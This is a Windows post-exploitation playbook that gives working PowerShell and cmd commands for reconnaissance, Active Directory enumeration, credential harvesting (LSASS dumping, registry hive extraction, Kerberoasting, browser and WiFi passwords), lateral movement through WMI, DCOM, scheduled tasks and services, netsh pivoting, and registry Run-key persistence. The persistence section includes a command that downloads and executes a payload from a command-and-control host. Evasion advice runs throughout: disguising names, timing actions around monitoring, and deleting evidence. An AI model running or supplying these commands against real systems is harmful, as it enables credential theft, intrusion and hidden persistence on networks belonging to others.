Living Off the Land: Windows Post-Exploitation—With Tactical Context & Usage Guide

With Tactical Context & Usage Guide

📋 PHASE 1: INITIAL RECONNAISSANCE

System Information

🎯 What to Identify: OS version, architecture, domain membership, patch level 💡 How to Use: Determines available tools, privilege escalation vectors, and attack surface. Older systems may lack modern logging/protections.

# OS Information - Identify version for vulnerability research
Get-WmiObject -Class Win32_OperatingSystem | Select-Object Caption, Version, BuildNumber, OSArchitecture

# Domain Check - Determines if you can pivot to AD environment
(Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain
(Get-WmiObject -Class Win32_ComputerSystem).Domain

# Current User Privileges - Shows what you can do without escalation
whoami /all
# Look for: Administrator group, SeDebugPrivilege, SeImpersonatePrivilege

Key Privileges to Note:

SeDebugPrivilege → Can dump LSASS memory for credentials
SeImpersonatePrivilege → Potential for privilege escalation (Potato attacks)
BUILTIN\Administrators → Full local system control
Domain Admins → Jackpot - domain-wide access

Local Enumeration

Local Users & Groups

🎯 What to Identify: Admin accounts, stale accounts, password age, enabled status 💡 How to Use: Target weak/old passwords, find privileged accounts, identify potential impersonation targets

# Local Users - Look for old passwords, disabled but exploitable accounts
Get-LocalUser | Select-Object Name, Enabled, LastLogon, PasswordLastSet
# Red flags: PasswordLastSet >1 year ago, never-used admin accounts, service accounts

# Local Administrators - Identify who has full system access
Get-LocalGroupMember -Group "Administrators"
# Note: Domain accounts here = those accounts can access from anywhere on network

What to Look For:

Default accounts still enabled (Administrator, Guest)
Service accounts in admin group (often have network access to other systems)
Users who haven't logged in recently but are enabled (abandoned accounts)
Passwords last set >365 days ago (likely weak or unchanged)

Running Processes & Services

🎯 What to Identify: Security products (EDR/AV), exploitable services, interesting applications 💡 How to Use: Understand what's monitoring you, find credential-rich processes, identify exploit targets

# Running Processes - Identify security products and interesting software
Get-Process | Select-Object ProcessName, Id, Path | Sort-Object ProcessName
# Look for: CrowdStrike, Carbon Black, SentinelOne, database tools, browsers

# Services Running as SYSTEM - Potential privilege escalation targets
Get-WmiObject win32_service | Where-Object {$_.StartName -eq "LocalSystem"} | Select-Object Name, PathName, State, StartMode
# Look for: Services YOU can restart, services with weak file permissions

# Unquoted Service Paths - Classic privilege escalation vulnerability
Get-WmiObject win32_service | Where-Object {
    $_.PathName -notlike '"*' -and
    $_.PathName -like '* *'
} | Select-Object Name, PathName, StartName, State

Unquoted Path Exploitation:

Service path: C:\Program Files\Vulnerable App\service.exe Windows tries: C:\Program.exe, then C:\Program Files\Vulnerable.exe, then the real path If you can write to C:\ → Place malicious Program.exe → Restart service → Code execution as SYSTEM

Security Products to Note:

CrowdStrike Falcon → Advanced EDR, monitors process injection, LSASS access
Carbon Black → Behavioural analysis, blocks known tools
Windows Defender → Basic protection, signature-based
SentinelOne → AI-based detection, monitors suspicious behaviour

Network Reconnaissance

🎯 What to Identify: Network topology, active connections, neighbouring systems, DNS servers 💡 How to Use: Map the network, identify lateral movement targets, understand network segmentation

# Network Configuration - Identify subnets, gateways, DNS (often = Domain Controllers)
Get-NetIPConfiguration
# DNS servers in domain = likely Domain Controllers (high-value targets)

# Established Connections - See what the user is connected to RIGHT NOW
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} |
    Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess
# Use: Identify file servers, databases, admin systems the user accesses

# ARP Cache - Systems this machine has recently talked to (LOW NOISE)
Get-NetNeighbor | Where-Object {$_.State -ne "Unreachable" -and $_.State -ne "Incomplete"}
# Use: These are your best lateral movement targets (normal communication pattern)

# Ping Sweep (NOISY! - Use only if desperate)
1..254 | ForEach-Object {
    $ip = "192.168.1.$_"
    if (Test-Connection -ComputerName $ip -Count 1 -Quiet -TimeoutSeconds 1) {
        Write-Output "$ip is alive"
    }
}
# Warning: Every ping is logged, network monitoring will see this

Network Analysis Tips:

DNS servers = Domain Controllers in most environments → Primary targets
ARP cache entries = Recent communication = Safe lateral movement targets
Port 445 (SMB) connections = File shares (may contain sensitive data)
Port 1433 (SQL) connections = Database servers (credential goldmine)
Port 3389 (RDP) connections = Admin workstations or servers

Software Enumeration

🎯 What to Identify: Development tools, vulnerable software, credential-storing applications 💡 How to Use: Find applications that store credentials, identify outdated/vulnerable versions, understand user role

# Installed Software (64-bit) - Look for tools that store credentials
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |
    Select-Object DisplayName, DisplayVersion, Publisher, InstallDate |
    Where-Object {$_.DisplayName -ne $null}

# Installed Software (32-bit on 64-bit systems)
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |
    Select-Object DisplayName, DisplayVersion, Publisher, InstallDate |
    Where-Object {$_.DisplayName -ne $null}

# Security Products - Know what's watching you
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct |
    Select-Object displayName, pathToSignedProductExe, productState

High-Value Applications:

Visual Studio / SQL Server Management Studio → Developer box = elevated access, database credentials
FileZilla / WinSCP → FTP credentials stored in config files
PuTTY / mRemoteNG → SSH/RDP credentials
VPN Clients → Network access credentials
Password Managers → Jackpot if you can crack the master password
Chrome / Firefox → Saved website credentials (can be extracted)

📋 PHASE 2: ACTIVE DIRECTORY ENUMERATION

PowerShell Method (Fast, Requires AD Module)

🎯 What to Identify: Domain structure, privileged users, domain controllers, trust relationships 💡 How to Use: Map AD environment, identify escalation paths, find high-value targets

# Domain Information - Basic domain structure
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Shows: Domain name, forest, domain controllers, domain functional level

# Domain Controllers - Critical infrastructure targets
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers |
    Select-Object Name, IPAddress, OSVersion
# Use: These are your ultimate targets, compromise DC = domain admin

# All Users (if AD module available)
Get-ADUser -Filter * -Properties * |
    Select-Object Name, SamAccountName, Enabled, LastLogonDate, PasswordLastSet, AdminCount
# AdminCount=1 → Current or former privileged account (investigate further)

# Domain Admins - The keys to the kingdom
Get-ADGroupMember -Identity "Domain Admins" -Recursive
# Use: These accounts are your primary targets for credential harvesting

AdminCount Explained:

When user is added to privileged group (Domain Admins, etc.), AdminCount is set to 1
Even if removed from group later, AdminCount stays 1
Useful: Find accounts that HAD privileges (may still have access)

ADSI Method (Works Everywhere, No Module Needed)

🎯 What to Identify: Same as above, but using built-in .NET classes 💡 How to Use: When ActiveDirectory PowerShell module isn't installed (common on workstations)

# Query All Users - Standard domain enumeration
$searcher = [ADSISearcher]"(objectClass=user)"
$searcher.PropertiesToLoad.AddRange(@("samaccountname","displayname","mail"))
$searcher.FindAll() | ForEach-Object {
    [PSCustomObject]@{
        Username = $_.Properties['samaccountname'][0]
        DisplayName = $_.Properties['displayname'][0]
        Email = $_.Properties['mail'][0]
    }
}

# Find Domain Admins - LDAP query with recursive group membership
$searcher = [ADSISearcher]"(memberOf:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=corp,DC=local)"
$searcher.FindAll() | ForEach-Object { $_.Properties['samaccountname'] }
# 1.2.840.113556.1.4.1941 = LDAP_MATCHING_RULE_IN_CHAIN (finds nested group members)

# Find All Computers - Identify lateral movement targets
$searcher = [ADSISearcher]"(objectClass=computer)"
$searcher.PropertiesToLoad.AddRange(@("name","operatingsystem","operatingsystemversion"))
$searcher.FindAll()
# Look for: Servers, domain controllers, admin workstations

# Passwords Never Expire - Weak password candidates
$searcher = [ADSISearcher]"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"
$searcher.FindAll() | ForEach-Object { $_.Properties['samaccountname'] }
# Use: These accounts likely have weak/old passwords → credential spray targets

# SPNs (Kerberoastable) - Request tickets, crack offline
$searcher = [ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))"
$searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname"))
$searcher.FindAll()
# Use: Request service tickets → Crack passwords offline → No account lockout risk

UserAccountControl Flags (Common Values):

512 = Normal user account
514 = Disabled account
65536 = Password never expires
32 = Password not required
1.2.840.113556.1.4.803 = Bitwise AND operator for LDAP queries

Native Tools Method (Command Line, Zero PowerShell)

🎯 What to Identify: Same information using cmd.exe tools only 💡 How to Use: When PowerShell is restricted/monitored, use these ancient but effective tools

REM Domain Controllers - Identify all DCs in domain
nltest /dclist:domain.local
REM Use: Target these for credential dumping (NTDS.dit contains all domain hashes)

REM Domain Trusts - Find paths to other domains
nltest /domain_trusts /all_trusts
REM Use: Compromised domain → pivot to trusted domains via trust relationships

REM List All Users
dsquery user -limit 0
REM Use: User enumeration without PowerShell

REM List All Computers
dsquery computer -limit 0

REM Domain Admins - The privileged group
dsquery group -name "Domain Admins" | dsget group -members
REM Use: Identify targets for credential harvesting, find where they are logged in

REM Find SPNs - Kerberoasting targets
setspn -Q */*
REM Use: Service accounts often have weak passwords, request tickets to crack offline

REM Users in Domain
net user /domain
REM Use: Basic user enumeration, works on ancient systems

REM Domain Password Policy - Understand lockout thresholds
net accounts /domain
REM Shows: Min password length, lockout threshold, lockout duration
REM Use: Avoid account lockouts during password spraying

REM Specific User Details
net user username /domain
REM Use: Check user's group memberships, last logon, password age

When to Use Native Tools:

PowerShell is disabled or heavily logged
PowerShell 2.0 environment (no script block logging)
Trying to avoid PowerShell-specific detection
Working from cmd.exe reverse shell

Remote System Enumeration (WMI)

🎯 What to Identify: Remote system info without logging in directly 💡 How to Use: Passive reconnaissance before lateral movement, identify vulnerable systems

# OS Information - Is target vulnerable? Is it worth targeting?
Get-WmiObject -Class Win32_OperatingSystem -ComputerName TARGET-PC
# Look for: Old OS versions (Windows 7, Server 2008), patch levels, architecture

# Processes - What's running? Any security products?
Get-WmiObject -Class Win32_Process -ComputerName TARGET-PC
# Look for: EDR agents, database clients, interesting applications

# Logged-in Users - Is a privileged user active?
Get-WmiObject -Class Win32_ComputerSystem -ComputerName TARGET-PC | Select-Object UserName
# Use: If domain admin is logged in → Target this machine for credential dumping

# Services - Find exploitable services
Get-WmiObject -Class Win32_Service -ComputerName TARGET-PC |
    Where-Object {$_.State -eq "Running"}
# Look for: Services running as privileged accounts, weak permissions

WMI Reconnaissance Strategy:

Query systems from ARP cache (low noise - already talking)
Identify logged-in users (privileged accounts?)
Check for security products (adjust tactics accordingly)
Assess patch level (vulnerable to known exploits?)
Plan lateral movement based on findings

📋 PHASE 3: CREDENTIAL HARVESTING

LSASS Memory Dump (High Value, High Risk)

🎯 What to Identify: Cached credentials in memory 💡 How to Use: Extract NTLM hashes, Kerberos tickets, cleartext passwords from memory

# Get LSASS Process ID
$lsass = Get-Process lsass
$lsassPid = $lsass.Id

# Dump LSASS using rundll32 + comsvcs.dll (Native Windows DLL)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\temp\lsass.dmp full
# Requires: SeDebugPrivilege (admin access)
# Creates: Memory dump containing all cached credentials

# Alternative: Task Manager Method (GUI)
# 1. Open Task Manager (Ctrl+Shift+Esc)
# 2. Details tab → Find lsass.exe
# 3. Right-click → Create dump file
# 4. Note the save location

# Parse Offline (on your attacker machine)
pypykatz lsa minidump lsass.dmp
# Extracts: NTLM hashes, Kerberos tickets, cleartext passwords (if WDigest enabled)

# Cleanup - Remove evidence
Remove-Item C:\temp\lsass.dmp -Force

What You Get:

NTLM Hashes → Crack offline or use for pass-the-hash
Kerberos Tickets (TGT/TGS) → Pass-the-ticket attacks
Cleartext Passwords → If WDigest is enabled (rare on modern systems)
Service Account Passwords → Often reused across systems

OPSEC Warnings:

⚠️ Many EDRs specifically monitor LSASS access
⚠️ Event ID 10 (process access) will be logged
⚠️ Sysmon logs LSASS access attempts
✅ Time dumps during maintenance windows or high activity periods

Registry Credential Extraction (Persistent Credentials)

🎯 What to Identify: Local account hashes, cached domain credentials, LSA secrets 💡 How to Use: Extract credentials that persist even after users log off

# Save Registry Hives (requires local admin)
reg save HKLM\SAM C:\temp\sam.hive        # Local account password hashes
reg save HKLM\SYSTEM C:\temp\system.hive  # Encryption keys for SAM
reg save HKLM\SECURITY C:\temp\security.hive  # Cached domain creds, LSA secrets

# Remote Registry (if RemoteRegistry service is running)
reg save \\TARGET-PC\HKLM\SAM C:\temp\remote_sam.hive
reg save \\TARGET-PC\HKLM\SYSTEM C:\temp\remote_system.hive

# Parse Offline (on attacker machine)
secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL

What You Get:

SAM Hive → Local account NTLM hashes (Administrator, local users)
SECURITY Hive → Cached domain credentials (last 10 domain logons by default)
LSA Secrets → Service account passwords, auto-logon credentials, VPN passwords

Cached Domain Credentials (MS Cache v2):

Windows caches last 10 domain logins (configurable)
Allows login when DC is unreachable
Slower to crack than NTLM, but still crackable
hashcat -m 2100 for cracking

LSA Secrets Can Contain:

Service account passwords (stored in plaintext)
Auto-logon credentials
VPN connection passwords
Scheduled task credentials

File-Based Credential Search (Low Hanging Fruit)

🎯 What to Identify: Passwords stored in files, scripts, configs 💡 How to Use: Quick wins - admins often store passwords in plaintext

# Search for Password Keywords - Cast wide net
Get-ChildItem C:\ -Recurse -Include *.txt,*.xml,*.ini,*.config,*.ps1,*.bat,*.cmd -ErrorAction SilentlyContinue |
    Select-String -Pattern "password" -CaseSensitive:$false |
    Group-Object Path | Select-Object Name
# Look in: User documents, script directories, web server configs

# Unattended Installation Files - Often contain local admin password
Get-ChildItem C:\Windows\Panther\ -Recurse -Include unattend.xml,autounattend.xml -ErrorAction SilentlyContinue
# Contains: Local admin password (base64 or plaintext) for automated deployments

# Group Policy Preferences - Legacy credential storage (pre-MS14-025)
Get-ChildItem C:\Windows\SYSVOL\ -Recurse -Include Groups.xml,Services.xml,Scheduledtasks.xml -ErrorAction SilentlyContinue
# Contains: AES-encrypted passwords (Microsoft published the key!)
# Use gpp-decrypt to decode

# VNC Passwords - Weakly encrypted
Get-ChildItem C:\ -Recurse -Include ultravnc.ini,vnc.ini -ErrorAction SilentlyContinue
# Contains: VNC passwords (weak DES encryption, easily crackable)

# Web.config - Database connection strings
Get-ChildItem C:\inetpub\ -Recurse -Include web.config -ErrorAction SilentlyContinue |
    Select-String -Pattern "connectionString"
# Contains: SQL Server credentials (often sa or other privileged accounts)

# FileZilla Credentials - FTP server access
Get-ChildItem C:\Users\*\AppData\Roaming\FileZilla\ -Include sitemanager.xml,recentservers.xml -ErrorAction SilentlyContinue
# Contains: FTP credentials in XML format (base64 encoded)

Common File Locations for Credentials:

C:\Users\*\Documents\*.txt → User notes, documentation
C:\scripts\ → Hardcoded credentials in automation
C:\inetpub\wwwroot\ → Web application credentials
C:\Windows\Panther\ → Unattended install files
C:\ProgramData\ → Application config files

PowerShell History (Goldmine)

🎯 What to Identify: Commands users have run (often includes passwords) 💡 How to Use: Admins frequently type credentials directly in PowerShell

# Current User History
$historyPath = (Get-PSReadlineOption).HistorySavePath
Get-Content $historyPath
# Look for: -Password, -Credential, Connect-* commands with credentials

# All Users History (requires admin)
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue |
    ForEach-Object {
        Write-Output "`n=== $($_.FullName) ==="
        Get-Content $_.FullName | Select-String -Pattern "password|credential|username|pwd"
    }

What You Might Find:

# Examples from real-world history files:
Invoke-Command -ComputerName SERVER01 -Credential (Get-Credential) # User typed password
$pass = ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force  # Hardcoded password!
net use Z: \\fileserver\share /user:DOMAIN\admin Password123      # SMB credentials
Enter-PSSession -ComputerName DC01 -Credential DOMAIN\admin        # Admin access

Search Patterns:

ConvertTo-SecureString with -AsPlainText → Cleartext passwords
New-Object System.Management.Automation.PSCredential → Credential creation
net use commands → Network share credentials
Invoke-Command with -Credential → Remote execution creds
Database connection strings

Browser Credentials (Requires DPAPI Keys)

🎯 What to Identify: Saved website passwords 💡 How to Use: Extract and decrypt with user's DPAPI master key

# Chrome Password Database Location
$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
Copy-Item $chromePath C:\temp\ChromePasswords.db

# Firefox (logins.json + key4.db)
$firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"

Decryption Process:

Extract Login Data database (SQLite)
Obtain user's DPAPI master key (from LSASS dump or LSA secrets)
Decrypt passwords using tools like SharpChrome or pypykatz
Get cleartext credentials for saved websites

Common Saved Credentials:

Internal web applications
Cloud services (AWS, Azure, O365)
VPN portals
Network equipment web interfaces

Credential Manager (Windows Vault)

🎯 What to Identify: Saved Windows credentials 💡 How to Use: Network shares, RDP, scheduled tasks often save credentials here

REM List Stored Credentials
cmdkey /list
REM Shows: Saved RDP connections, network shares, generic credentials

REM Credential Files Location
dir C:\Users\*\AppData\Local\Microsoft\Credentials\ /s
dir C:\Users\*\AppData\Roaming\Microsoft\Credentials\ /s

Credential Manager Contents:

Saved RDP connections
Network share credentials (\\fileserver\share)
Windows Domain credentials
Generic credentials (applications can store here)

To Decrypt:

Requires user's DPAPI master key
Use mimikatz, pypykatz, or SharpDPAPI
Master key in LSASS dump or protected in user profile

Kerberoasting (Service Account Passwords)

🎯 What to Identify: Service accounts with weak passwords 💡 How to Use: Request service tickets, crack offline, no account lockout risk

# Find Kerberoastable Accounts - Accounts with SPNs
$searcher = [ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))"
$searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname","pwdlastset"))
$results = $searcher.FindAll()

# Request Service Tickets - Get encrypted tickets
Add-Type -AssemblyName System.IdentityModel

foreach ($result in $results) {
    $spn = $result.Properties['serviceprincipalname'][0]
    $username = $result.Properties['samaccountname'][0]
    
    try {
        $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
        Write-Output "[+] Ticket requested for $username ($spn)"
    }
    catch {
        Write-Output "[-] Failed: $($_.Exception.Message)"
    }
}

# List Cached Tickets - Verify tickets were received
klist

# Extract from LSASS dump (offline on attacker machine)
pypykatz lsa minidump lsass.dmp -k kerberos_tickets

# Crack with Hashcat
hashcat -m 13100 -a 0 tickets.txt wordlist.txt  # AES256
hashcat -m 19700 -a 0 tickets.txt wordlist.txt  # AES128
hashcat -m 18200 -a 0 tickets.txt wordlist.txt  # RC4 (faster to crack)

Why Kerberoasting Works:

Service tickets are encrypted with service account's password hash
ANY domain user can request service tickets
Crack the ticket offline → No account lockout
Service accounts often have weak, old passwords
Many have excessive privileges (Domain Admins)

Target Priority:

Old passwords (pwdlastset >1 year ago)
RC4 encryption (faster to crack than AES)
Accounts with "svc", "service", "sql" in the name
Accounts that are also in privileged groups

Common Service Accounts:

MSSQLSvc/* → SQL Server service accounts (often privileged)
HTTP/* → Web application pool accounts
FIMService → Forefront Identity Manager
Custom service accounts (svc_backup, svc_sharepoint)

📋 PHASE 4: LATERAL MOVEMENT

PowerShell Remoting (Modern, Stealthy)

🎯 What to Identify: Systems with WinRM enabled, valid credentials 💡 How to Use: Remote command execution that looks like legitimate IT administration

# Test WinRM Availability - Is PowerShell Remoting enabled?
Test-WSMan -ComputerName TARGET-PC
# Returns: System info if successful, error if WinRM disabled/firewalled

# Interactive Session - Full remote PowerShell shell
Enter-PSSession -ComputerName TARGET-PC -Credential (Get-Credential)
# Use: Manual exploration, interactive commands
# Creates: Persistent session until you exit

# Single Command Execution - Run one command and disconnect
Invoke-Command -ComputerName TARGET-PC -ScriptBlock { whoami }
# Use: Quick queries, low-footprint execution
# Benefit: Connection exists only during command execution

# With Credentials (Non-Interactive)
$password = ConvertTo-SecureString "P@ssw0rd123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("DOMAIN\username", $password)
Invoke-Command -ComputerName TARGET-PC -Credential $cred -ScriptBlock { Get-Process }
# Use: Scripted lateral movement, no manual credential entry

# Multiple Targets Simultaneously - Parallel execution
$targets = @("TARGET-PC1", "TARGET-PC2", "TARGET-PC3")
Invoke-Command -ComputerName $targets -Credential $cred -ScriptBlock { whoami }
# Use: Mass enumeration, simultaneous credential harvesting
# Output includes PSComputerName to identify source

# Execute Local Script Remotely - Run script without uploading
Invoke-Command -ComputerName TARGET-PC -FilePath C:\scripts\enum.ps1
# Use: Complex enumeration without touching disk on target
# Benefit: Script never written to target disk (in-memory execution)

PowerShell Remoting Logs Created:

Source System: Event 4648 (explicit credential use)
Target System: Event 4624 (logon type 3 - network)
WinRM Logs: Microsoft-Windows-WinRM/Operational
PowerShell Logs: Event 4103/4104 if script block logging enabled

Double-Hop Problem:

You → System A (PSRemoting) → System B (Access Denied!)

Why? Credentials aren't passed to second hop by design

Solution: CredSSP (but requires configuration changes)

WMI Execution (Broad Compatibility)

🎯 What to Identify: Systems accessible via RPC/DCOM (port 135 + dynamic ports) 💡 How to Use: Command execution on systems without WinRM, works on older Windows

# Execute Command via WMI - No WinRM required
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\output.txt" -ComputerName TARGET-PC
# Challenge: No direct output (command runs asynchronously)
# Solution: Redirect to file, read file separately

# Read Output via Administrative Share
Get-Content \\TARGET-PC\C$\temp\output.txt
# Requires: Admin rights for C$ access

# Execute PowerShell via WMI for Better Output Handling
$command = "Get-Process | ConvertTo-Json"
$encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell.exe -EncodedCommand $encodedCommand" -ComputerName TARGET-PC

# Command Line (wmic) - Works from cmd.exe
wmic /node:TARGET-PC process call create "cmd.exe /c whoami"
# Use: From cmd.exe shells, older systems

WMI Advantages:

Works on Windows 7, Server 2008, and older
No WinRM configuration required
Available by default in most environments
Uses standard DCOM (not often blocked)

WMI Disadvantages:

No direct command output (need file redirection)
Uses dynamic RPC ports (firewall challenges)
Event 4624 (logon type 3) logged
Less stealthy than PowerShell Remoting

Typical WMI Workflow:

Execute command with output to file
Wait a few seconds for completion
Read file via C$ share
Delete file to clean up
Continue to next target

DCOM Execution (Less Common, Less Monitored)

🎯 What to Identify: Systems with DCOM enabled (default) 💡 How to Use: Stealthy execution through legitimate COM objects

# MMC20.Application - Microsoft Management Console automation
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","TARGET-PC"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","7")
# "7" = Hidden window

# ShellWindows - Windows Explorer automation
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET-PC"))
$item = $dcom.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)

# ShellBrowserWindow - Similar to ShellWindows
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET-PC"))
$item = $dcom.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)

Why DCOM is Stealthy:

Less commonly monitored than WMI/PSRemoting
Uses legitimate Windows components
Standard DCOM traffic (port 135)
Many security tools don't specifically watch for DCOM abuse

DCOM Challenges:

Requires admin credentials
No command output (like WMI)
COM objects may not be available on all systems
Some EDRs now monitor after public disclosure

When to Use DCOM:

WinRM is disabled/monitored
Want to avoid WMI detection
Target is Windows 10/Server 2016+
Need stealthy lateral movement

Scheduled Tasks (Persistence + Execution)

🎯 What to Identify: Remote task creation capabilities 💡 How to Use: Create tasks that execute commands immediately or on schedule

REM Create Task
schtasks /create /tn "WindowsUpdate" /tr "cmd.exe /c whoami > C:\temp\output.txt" /sc once /st 00:00 /S TARGET-PC /U DOMAIN\username /P password
# /tn = Task name (use legitimate-looking names)
# /tr = Command to run
# /sc once = Run once (can use daily, weekly, etc.)
# /st = Start time (00:00 = midnight)

REM Run Task Immediately
schtasks /run /tn "WindowsUpdate" /S TARGET-PC /U DOMAIN\username /P password

REM Delete Task (Cleanup)
schtasks /delete /tn "WindowsUpdate" /S TARGET-PC /U DOMAIN\username /P password /F

REM Create as SYSTEM - Elevated Execution
schtasks /create /tn "WindowsUpdate" /tr "cmd.exe /c command" /sc once /st 00:00 /ru SYSTEM /S TARGET-PC /U DOMAIN\username /P password

# PowerShell Method - More Control
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -Command Get-Process"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1)
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest

Register-ScheduledTask -TaskName "SystemMaintenance" -Action $action -Trigger $trigger -Principal $principal -CimSession TARGET-PC

Scheduled Task Advantages:

Can run as SYSTEM (highest privileges)
Scheduled execution (run during off-hours)
Persistence mechanism
Works remotely

Detection Events:

Event ID 106: Task registered
Event ID 200: Task executed
Event ID 141: Task removed

OPSEC Tips:

Use names matching real Windows tasks
Schedule during legitimate maintenance windows
Clean up after execution
Avoid obviously malicious task names

Service-Based Movement

🎯 What to Identify: Service creation rights on remote systems 💡 How to Use: Execute code as SYSTEM through Windows services

REM Create Service
sc.exe \\TARGET-PC create UpdateService binPath= "cmd.exe /c whoami > C:\temp\output.txt" start= demand
# Note: Space after = is required!
# binPath = Command to execute
# start= demand = Manual start (use auto for automatic)

REM Start Service
sc.exe \\TARGET-PC start UpdateService
# Warning: Service must respond to SCM (Service Control Manager)
# Simple commands may fail with "service didn't respond" error

REM Delete Service (Cleanup)
sc.exe \\TARGET-PC delete UpdateService

Service Execution Challenges:

Problem: cmd.exe doesn't implement service interface
Result: Service starts, executes, but Windows reports failure
Impact: Command still executes, but error is logged

Better Service Execution:

REM Use service-friendly wrapper
sc.exe \\TARGET-PC create UpdateService binPath= "C:\Windows\System32\cmd.exe /c start /b powershell.exe -Command payload" start= demand

Detection:

Event ID 7045: New service installed
Event ID 7036: Service state change
Service name/binary logged in Security event log

netsh Pivoting (Network Redirection)

🎯 What to Identify: Need to access internal services not directly reachable 💡 How to Use: Turn compromised host into network pivot point

REM Port Forward Setup - Forward port 8080 to internal server port 80
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.10.50
# Now: Connect to compromised-host:8080 → Forwards to 192.168.10.50:80

REM Show Active Forwards
netsh interface portproxy show all

REM Delete Specific Forward
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0

REM Reset All Forwards
netsh interface portproxy reset

Pivot Use Cases:

REM RDP to Internal System
netsh interface portproxy add v4tov4 listenport=3389 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.10.10.50
REM Connect: mstsc /v:compromised-host:3389 → Actually connects to 10.10.10.50

REM Access Internal Web App
netsh interface portproxy add v4tov4 listenport=8443 listenaddress=0.0.0.0 connectport=443 connectaddress=internal-app.local
REM Browse: https://compromised-host:8443 → Proxies to internal app

REM SQL Server Access
netsh interface portproxy add v4tov4 listenport=1433 listenaddress=0.0.0.0 connectport=1433 connectaddress=sql-server.internal
REM Connect: SQL client to compromised-host:1433 → Reaches internal SQL

WiFi Credential Extraction:

REM List All Saved WiFi Networks
netsh wlan show profiles

REM Show Password for Specific Network
netsh wlan show profile name="CompanyWiFi" key=clear
REM Output includes: "Key Content : P@ssw0rd123!"

REM Export All Profiles with Passwords
netsh wlan export profile key=clear folder=C:\temp
REM Creates XML files with passwords for all saved networks

Firewall Manipulation:

REM Add Firewall Rule (Stealthier than disabling firewall)
netsh advfirewall firewall add rule name="Allow Port 4444" dir=in action=allow protocol=TCP localport=4444

REM Delete Rule
netsh advfirewall firewall delete rule name="Allow Port 4444"

REM Disable Firewall (VERY OBVIOUS - Avoid!)
netsh advfirewall set allprofiles state off

Why netsh is Powerful:

Native Windows tool (no uploads needed)
Port forwards persist across reboots
Legitimate administrative use (hard to detect abuse)
Works on all modern Windows versions

📋 PHASE 5: PERSISTENCE

Registry Run Keys (Classic, Well-Known)

🎯 What to Identify: Registry locations that execute on user logon 💡 How to Use: Simple persistence, but commonly monitored

# Current User (No Admin Required) - Executes when THIS user logs in
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDriveUpdate" -Value "powershell.exe -WindowStyle Hidden -NoProfile -Command IEX (New-Object Net.WebClient).DownloadString('http://c2.com/payload.ps1')" -Force
# Scope: Only this user
# Requires: User account access
# Visibility: User can see in Task Manager startup

# Local Machine (Admin Required) - Executes for ALL users
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "SecurityUpdate" -Value "powershell.exe -WindowStyle Hidden -Command payload" -Force
# Scope: All users
# Requires: Admin rights
# Visibility: Affects all users, more likely to be noticed

# RunOnce Keys - Execute once then self-delete
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name "ConfigUpdate" -Value "powershell.exe -Command payload" -Force
# Use: Can re-create itself for persistence chain

Run Key Locations (Priority Order):

HKLM\Software\Microsoft\Windows\CurrentVersion\Run # All users 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce # All users, once 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run # Current user 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce # Current user, once 
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

OPSEC Considerations:

⚠️ Very well-known persistence method
⚠️ Easily detected by autoruns tools
⚠️ Commonly monitored by EDR
✅ Use legitimate-looking names ("OneDriveUpdate", "GoogleUpdateCore")
✅ Point to legitimate paths when possible

